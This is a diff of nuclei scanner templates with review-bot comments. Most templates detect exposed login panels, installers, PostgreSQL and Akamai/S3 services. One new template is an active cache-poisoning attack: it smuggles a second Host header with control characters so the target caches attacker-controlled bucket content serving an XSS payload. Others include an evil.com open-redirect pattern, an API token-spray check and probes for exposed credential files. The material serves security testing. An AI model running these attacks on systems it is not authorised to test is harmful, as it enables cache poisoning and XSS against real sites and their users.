@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: netris-dashboard-panel
info:
name: Netris Dashboard Panel
name: Netris Dashboard Panel - Detect
author: theamanrawat
severity: info
description: Netris Dashboard panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Netris Dashboard"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -0,0 +1,32 @@
id: netsparker-panel
info:
name: Netsparker Panel
author: pussycat0x
severity: info
description: |
Netsparker is a fully configurable Enterprise Dynamic Application Security Testing (DAST) tool. A DAST tool communicates with a web application using the web front-end in order to identify potential security vulnerabilities in the web application.
reference:
- https://www.invicti.com/
metadata:
verified: true
shodan-query: http.title:"Sign in to Netsparker Enterprise"
tags: panel,netsparker
requests:
- method: GET
path:
- "{{BaseURL}}/account/signin?ReturnUrl=%2f"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Netsparker Ltd"
- "Netsparker Enterprise"
condition: and
- type: status
status:
- 200


@ -1,13 +1,17 @@
id: opencart-panel
info:
name: OpenCart Login Panel
name: OpenCart Login Panel - Detect
author: ricardomaia
severity: info
description: |
OpenCart is an open-source online store management system.
OpenCart login panel was detected.
reference:
- https://www.opencart.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: html:"OpenCart"
@ -28,3 +32,5 @@ requests:
- '(?i)footer\s.*OpenCart.*All.Rights.Reserved|img\s.*logo.*\salt=.*OpenCart'
- "(?i)Powered.By.*http.*OpenCart"
condition: or
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: planet-estream-panel
info:
name: Planet eStream Login Panel
name: Planet eStream Login Panel - Detect
author: arafatansari
severity: info
description: Planet eStream login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Login - Planet eStream"
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: posthog-admin-panel
info:
name: Posthog Admin Panel
name: PostHog Login Panel - Detect
author: theabhinavgaur
severity: info
description: PostHog login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"posthog"
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: retool-login
info:
name: Retool Login
name: Retool Login Panel - Detect
author: DhiyaneshDk
severity: info
description: Retool login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Retool"
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,11 +1,16 @@
id: riseup-panel
info:
name: Rise Up Panel
name: Rise Up Login Panel - Detect
author: righettod
severity: info
description: Rise Up login panel was detected.
reference:
- https://www.riseup.ai/en/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
tags: panel,riseup
@ -33,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: rocketmq-console-exposure
info:
name: Apache RocketMQ Console Exposure
name: Apache RocketMQ Console Panel - Detect
author: pdteam
severity: info
description: Apache RocketMQ Console panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,apache
requests:
@ -15,3 +20,5 @@ requests:
- type: word
words:
- "<title>RocketMq-console-ng</title>"
# Enhanced by md on 2023/01/03


@ -1,11 +1,16 @@
id: room-alert-detect
info:
name: AVTECH Room Alert - Panel Detect
name: AVTECH Room Alert Login Panel - Detect
author: gy741
severity: info
description: AVTECH Room Alert login panel was detected.
reference:
- https://avtech.com/articles/166/how-to-access-a-room-alert-monitors-settings-pages-2/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Room Alert"
@ -36,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: royalevent-management-panel
info:
name: Royal Event Management Admin Panel
name: Royal Event Management System Admin Panel - Detect
author: ritikchaddha
severity: info
description: Royal Event Management System admin panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
tags: royalevent,panel
@ -26,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: rsa-self-service
info:
name: Detect RSA Self-Service Panel
name: RSA Self-Service Login Panel - Detect
author: PR3R00T
severity: info
description: RSA Self-Service login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,rsa
requests:
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: rstudio-detect
info:
name: RStudio panel detector
name: RStudio Panel - Detect
author: philippedelteil
severity: info
description: RStudio panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,rstudio
requests:
@ -19,3 +24,5 @@ requests:
- type: status
status:
- 302
# Enhanced by md on 2023/01/03


@ -1,25 +1,32 @@
id: ruckus-wireless-admin-login
info:
name: Ruckus Wireless Admin Login Panel
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: title:"ruckus"
tags: panel,exposed,ruckus
requests:
- method: GET
path:
- '{{BaseURL}}/login.asp'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Ruckus Wireless Admin</title>"
- type: status
status:
- 200
id: ruckus-wireless-admin-login
info:
name: Ruckus Wireless Admin Login Panel - Detect
author: pussycat0x
severity: info
description: Ruckus Wireless admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"ruckus"
tags: panel,exposed,ruckus
requests:
- method: GET
path:
- '{{BaseURL}}/login.asp'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Ruckus Wireless Admin</title>"
- type: status
status:
- 200
# Enhanced by md on 2023/01/03


@ -1,9 +1,14 @@
id: rg-uac-panel
info:
name: RG-UAC Ruijie Login Panel
name: Ruijie RG-UAC Login Panel - Detect
author: princechaddha
severity: info
description: Ruijie RG-UAC login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.html:"Get_Verify_Info"
tags: panel,ruijie,router,firewall
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

@ -1,9 +1,14 @@
id: rundeck-login
info:
name: RunDeck Login Panel
name: Rundeck Login Panel - Detect
author: DhiyaneshDk, daffainfo
severity: info
description: Rundeck login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Rundeck"
@ -37,3 +42,5 @@ requests:
- 'utm_medium=([0-9.]+)-'
- 'data-version-string=\"([0-9.-]+)\"' ## Detection version on old rundeck
- '<span class="version">([0-9.-]+)<\/span>' ## Detection on very old rudneck
# Enhanced by md on 2023/01/03

@ -1,9 +1,14 @@
id: rustici-content-controller
info:
name: Rustici Content Controller
name: Rustici Content Controller Panel - Detect
author: DhiyaneshDk
severity: info
description: Rustici Content Controller panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Rustici Content Controller"
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

@ -1,11 +1,16 @@
id: saferoads-vms-login
info:
name: Saferoads VMS Login
name: Saferoads VMS Login Panel - Detect
author: dhiyaneshDk
severity: info
description: Saferoads VMS login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/6941
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,edb
requests:
@ -15,4 +20,6 @@ requests:
matchers:
- type: word
words:
- 'Saferoads VMS'
- 'Saferoads VMS'
# Enhanced by md on 2023/01/03

@ -1,9 +1,14 @@
id: sage-panel
info:
name: Sage X3 Login Panel
name: Sage X3 Login Panel - Detect
author: pikpikcu,daffainfo
severity: info
description: Sage X3 login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Sage X3"
tags: panel,sage,login
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

@ -1,9 +1,14 @@
id: samba-swat-panel
info:
name: Samba SWAT panel
name: Samba SWAT Panel - Detect
author: PR3R00T
severity: info
description: Samba SWAT panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,samba
requests:
@ -16,3 +21,5 @@ requests:
words:
- 'Basic realm="SWAT"'
part: header
# Enhanced by md on 2023/01/03

@ -1,9 +1,14 @@
id: samsung-printer-detect
info:
name: SAMSUNG Printer Detection
name: Samsung Printer Panel - Detect
author: pussycat0x
severity: info
description: Samsung printer panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
fofa-query: app="SAMSUNG-Printer"
tags: iot,panel,samsung,printer
@ -22,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

@ -1,9 +1,14 @@
id: sap-hana-xsengine-panel
info:
name: SAP HANA XSEngine Admin Panel
name: SAP HANA XS Engine Admin Login Panel - Detect
author: PR3R00T
severity: info
description: SAP HANA XS Engine admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,sap
requests:
@ -16,3 +21,5 @@ requests:
words:
- "/sap/hana/xs/formLogin/images/sap.png"
part: body
# Enhanced by md on 2023/01/03

@ -0,0 +1,31 @@
id: watershed-panel
info:
name: Watershed Panel Detect
author: tess
severity: info
metadata:
verified: "true"
shodan-query: http.title:"Watershed LRS"
tags: panel,watershed
requests:
- method: GET
path:
- '{{BaseURL}}/app/outside.html#/signin'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Watershed LRS"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
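Review bot: The request path `{{BaseURL}}/app/outside.html#/signin` carries a URL fragment, and fragments are not part of the HTTP request target, so the server will most likely only ever see `/app/outside.html`; writing the path as `'{{BaseURL}}/app/outside.html'` makes the template say what is actually requested. This new file also lacks the `description` and the `... Panel - Detect` naming that the same commit applies to the existing panel templates, e.g. `name: Watershed Panel - Detect`. `verified: "true"` is a quoted string here while the edited templates use the boolean `verified: true`; manageengine-network-config and akamai-s3-cache-poisoning in this commit have the same quoting.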

@ -0,0 +1,28 @@
id: manageengine-network-config
info:
name: Zoho Manage Engine Network Configuration Manager
author: righettod
severity: info
metadata:
verified: "true"
shodan-query: http.title:"Network Configuration Manager"
tags: panel,zoho,manageengine
requests:
- method: GET
path:
- '{{BaseURL}}/apiclient/ember/Login.jsp'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Network Configuration Manager'
- 'https://www.manageengine.com'
condition: and
- type: status
status:
- 200

@ -2,7 +2,7 @@ id: zend-config-file
info:
name: Zend Configuration File
author: pdteam,geeknik
author: pdteam,geeknik,Akokonunes
severity: high
tags: config,exposure,zend,php
@ -26,10 +26,10 @@ requests:
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "resources.db.params.password"
- "resources.db.params.username"
- type: regex
regex:
- "db.*(.password).*="
- "db.*(.username).*="
condition: and
- type: word
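Review bot: The replacement patterns `db.*(.password).*=` and `db.*(.username).*=` in the second hunk are much looser than the two literals they replace: every `.` is an unescaped wildcard and `.*` spans the rest of the line, so any line containing `db`, then `password` preceded by any character, then `=` satisfies them. On a `severity: high` exposure template that raises the false-positive rate; how much depends on the remaining matchers, which lie outside the hunk. A tighter form that still covers other key prefixes would be `'db[\w.]*\.password\s*='` and `'db[\w.]*\.username\s*='`, single-quoted so the backslashes stay literal.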

@ -16,7 +16,9 @@ requests:
- method: GET
path:
- "{{BaseURL}}/appsettings.json"
- "{{BaseURL}}/appsettings.Production.json"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
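Review bot: With `stop-at-first-match: true` added alongside the second path, a host that serves both files is reported only for `appsettings.json`, so the result never shows that `appsettings.Production.json` is exposed as well. If the production file is the more important finding, list it first, or drop `stop-at-first-match` so each exposed file yields its own result. The matcher list continues past the end of the hunk.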

@ -0,0 +1,29 @@
id: mobiproxy-dashboard
info:
name: MobiProxy Dashboard Exposure
author: tess
severity: medium
metadata:
verified: true
shodan-dork: http.title:"MobiProxy"
tags: dashboard,exposure,mobiproxy
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>MobiProxy'
- 'Dashboard'
- 'Setting'
condition: and
- type: status
status:
- 200
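Review bot: The metadata key is `shodan-dork`, while the other templates in this commit use `shodan-query`, so tooling that indexes templates by that key will not pick this one up; rename it to `shodan-query: http.title:"MobiProxy"`. The file is rated `severity: medium` but has no `description` explaining what an exposed dashboard lets an unauthenticated visitor see or change, which is what a reader needs to judge that rating. `'Dashboard'` and `'Setting'` are generic words, so the `<title>MobiProxy` marker is effectively carrying the match.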

@ -18,7 +18,7 @@ requests:
- type: word
part: body
words:
- '2022'
- '2023'
negative: true
- type: regex
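Review bot: The negative matcher is keyed to a literal year, so this template needs the same one-line edit every January and gives wrong results on any checkout older than the current year. A comment above the word, such as `# must equal the current year; update annually`, would document that maintenance contract. Deriving the year at run time would remove it, if the engine's DSL offers a current-date helper in the version this repository targets. The surrounding matcher block starts and ends outside the hunk.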

@ -0,0 +1,64 @@
id: akamai-s3-cache-poisoning
info:
name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting
author: DhiyaneshDk
severity: high
reference:
- https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
- https://owasp.org/www-community/attacks/Cache_Poisoning
metadata:
verified: "true"
tags: cache,poisoning,generic,xss,akamai,s3
variables:
rand: "{{rand_base(5)}}"
requests:
- raw:
- |+
GET /nuclei.svg?{{rand}}=x HTTP/1.1
Host: {{Hostname}}
{{escape}}Host: {{bucket}}
- |+
GET /nuclei.svg?{{rand}}=x HTTP/1.1
Host: {{Hostname}}
attack: clusterbomb
payloads:
escape:
- "\x0b"
- "\x0c"
- "\x1c"
- "\x1d"
- "\x1e"
- "\x1f"
bucket:
- "nuclei-ap-northeast-1"
- "nuclei-ap-northeast-2"
- "nuclei-ap-northeast-3"
- "nuclei-ap-south-1"
- "nuclei-ap-southeast-1"
- "nuclei-ap-southeast-2"
- "nuclei-ca-central-1"
- "nuclei-eu-central-1"
- "nuclei-eu-north-1"
- "nuclei-eu-west-1"
- "nuclei-eu-west-2"
- "nuclei-eu-west-3"
- "nuclei-sa-east-1"
- "nuclei-us-east-1"
- "nuclei-us-east-2"
- "nuclei-us-west-1"
- "nuclei-us-west-2"
stop-at-first-match: true
unsafe: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "alert(document.domain)")'
- 'status_code_2 == 200'
condition: and
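Review bot: The first raw request appears intended to make the target's cache store a response fetched from an external bucket, so running this template changes state on the scanned host, yet `tags` has no `intrusive` entry and there is no `description` saying so. Add `intrusive` to the tag list so operators who exclude state-changing templates skip it, and add a description stating that the random `{{rand}}` query key confines the cached entry to a throwaway URL. The verdict also depends on what the `nuclei-<region>` buckets serve at `/nuclei.svg`; the file does not say who owns those buckets, and a comment naming the owner would let users judge that dependency.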

@ -0,0 +1,33 @@
id: acunetix-360-installer
info:
name: Acunetix 360 Installer
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:-347188002
tags: misconfig,exposure,install,acunetix
requests:
- method: GET
path:
- "{{BaseURL}}/wizard/database/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Acunetix 360 - Installation Wizard"
- "License"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

@ -0,0 +1,33 @@
id: impresspages-installer
info:
name: ImpressPages Installer
author: pussycat0x
severity: low
metadata:
verified: true
shodan-query: http.title:"ImpressPages installation wizard"
tags: misconfig,exposure,install,impresspages
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ImpressPages installation wizard"
- "Configuration"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

@ -0,0 +1,26 @@
id: monstra-installer
info:
name: Monstra Installation Exposure
author: ritikchaddha
severity: high
metadata:
verified: true
shodan-query: 'title:"Monstra :: Install"'
tags: misconfig,monstra,install
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Monstra :: Install"
- type: status
status:
- 200
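Review bot: This `severity: high` template fires on a single body string, `Monstra :: Install`, plus a 200, while the sibling installer templates added in this commit (acunetix-360, impresspages, netsparker-enterprise, orangehrm) each require two body markers and a `text/html` content type. A page that merely quotes the installer title would match. Add the header matcher the siblings use (`part: header` with the word `text/html`) and a second installer-specific body string taken from a real installation page. The installer templates in this commit also range from `info` to `high` for the same class of finding; a `description` per file stating what the exposed installer permits would justify each rating.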

@ -0,0 +1,33 @@
id: netsparker-enterprise-installer
info:
name: Netsparker Enterprise Installer
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:-1575154882
tags: misconfig,exposure,install,netsparker
requests:
- method: GET
path:
- "{{BaseURL}}/wizard/database/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Netsparker Enterprise - Installation Wizard"
- "Netsparker Ltd"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

@ -0,0 +1,33 @@
id: orangehrm-installer
info:
name: OrangeHrm Installer
author: pussycat0x
severity: high
metadata:
verified: true
shodan-query: http.title:"OrangeHRM Web Installation Wizard"
tags: misconfig,exposure,install,orangehrm
requests:
- method: GET
path:
- "{{BaseURL}}/installer/installerUI.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "OrangeHRM Web Installation Wizard"
- "admin user creation"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

@ -0,0 +1,39 @@
id: pgsql-detect
info:
name: Postgresql Detection
author: nybble04
severity: info
description: |
PostgreSQL, also known as Postgres, is a free and open-source relational database management system emphasizing extensibility and SQL compliance.
reference:
- https://www.postgresql.org/docs/current/errcodes-appendix.html
- https://www.postgresql.org/docs/current/client-authentication-problems.html
metadata:
verified: true
shodan-query: port:5432 product:"PostgreSQL"
tags: network,postgresql,db
network:
- inputs:
- data: "000000500003000075736572006e75636c6569006461746162617365006e75636c6569006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000"
type: hex
- data: "7000000036534352414d2d5348412d32353600000000206e2c2c6e3d2c723d000000000000000000000000000000000000000000000000"
type: hex
host:
- "{{Hostname}}"
- "{{Host}}:5432"
read-size: 2048
matchers:
- type: word
part: body
words:
- "28000" # Error code for invalid_authorization_specification
- "28P01" # Error code for invalid_password
- "SCRAM-SHA-256" # Authentication prompt
- "pg_hba.conf" # Client authentication config file
- "user \"nuclei\"" # The user nuclei (sent in request) doesn't exist
- "database \"nuclei\"" # The db nuclei (sent in request) doesn't exist"
condition: or
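Review bot: The word list is combined with `condition: or`, so the bare five-character strings `28000` and `28P01` are each sufficient on their own, and `{{Hostname}}` in `host` sends the probe to whatever port the user supplied, not only 5432. Any service whose reply contains `28000` within the 2048 bytes read is then reported as PostgreSQL. In a PostgreSQL error message the SQLSTATE field is prefixed with the field-type byte `C`, so `"C28000"` and `"C28P01"` would be tighter, assuming the matcher sees the raw response bytes. The comment on the last word ends with a stray `"`.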

@ -0,0 +1,25 @@
id: akamai-detect
info:
name: akamai cdn detection
author: pdteam
severity: info
reference:
- https://support.globaldots.com/hc/en-us/articles/115003996705-Akamai-Pragma-Headers-overview
- https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US
- https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
tags: akamai,cdn,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Pragma: akamai-x-cache-on
matchers:
- type: word
part: x_cache
words:
- "deploy.akamai"

@ -10,8 +10,16 @@ requests:
- method: GET
path:
- "{{BaseURL}}/%c0"
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- "(?:InvalidURI|InvalidArgument|NoSuchBucket)"
part: body
- type: dsl
dsl:
- 'contains(to_lower(server), "amazons3")'
- 'contains(to_lower(header), "x-amz-id")'
- 'contains(to_lower(header), "x-amz-request-id")'
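Review bot: The new `dsl` matcher lists three expressions without a `condition` key, and together with `matchers-condition: or` any single one of them is enough, assuming the engine defaults to `or` within a matcher; state `condition: or` explicitly so the intent is visible. `x-amz-request-id` and the `x-amz-id` prefix are also returned by S3-compatible object stores, so a hit means "speaks the S3 API" rather than "is Amazon S3" unless the `server` check is required as well. If Amazon S3 specifically is the claim, keep the `server` expression in its own matcher and document what the header-only match means in the template description. The template's `info` block is outside the hunk.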

@ -0,0 +1,25 @@
id: api-zerobounce
info:
name: Zerobounce API Test
author: 0xlittleboy
severity: info
reference:
- https://www.zerobounce.net/docs/email-validation-api-quickstart
metadata:
verified: true
tags: token-spray,zerobounce
self-contained: true
requests:
- method: GET
path:
- "https://api.zerobounce.net/v2/getapiusage?api_key={{token}}&start_date=2018-01-01&end_date=2019-12-12"
matchers:
- type: word
part: body
words:
- '"total":'
- '"start_date":'
- '"end_date":'
condition: and
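Review bot: The matcher accepts any body containing the three keys `"total":`, `"start_date":` and `"end_date":` and has no status matcher or negative check. The file does not show what the API returns for a rejected key, so it is worth confirming that an invalid token does not echo the same fields alongside an error message. If it does, add a negative word matcher on the error field, or a `- type: status` matcher for 200 if bad keys are rejected with a non-200 code. The token travels in the query string of the path shown, so it will appear in the logs of any proxy between the scanner and the API; a `description` noting that would help users who test live credentials.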

@ -114,7 +114,7 @@ requests:
matchers-condition: and
matchers:
- type: regex
part: location
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

@ -1,7 +1,7 @@
id: qibocms-file-download
info:
name: Qibocms - Arbitary File Download
name: Qibocms - Arbitrary File Download
author: theabhinavgaur
severity: high
metadata:

@ -21,7 +21,7 @@ info:
verified: true
shodan-query: title:"VMware Appliance Management"
fofa-query: title="VMware Appliance Management"
tags: rce,msf,vmware,xstream
tags: vmware,xstream,rce,msf
variables:
lowerrstr: "{{to_lower(rand_text_alpha(6))}}"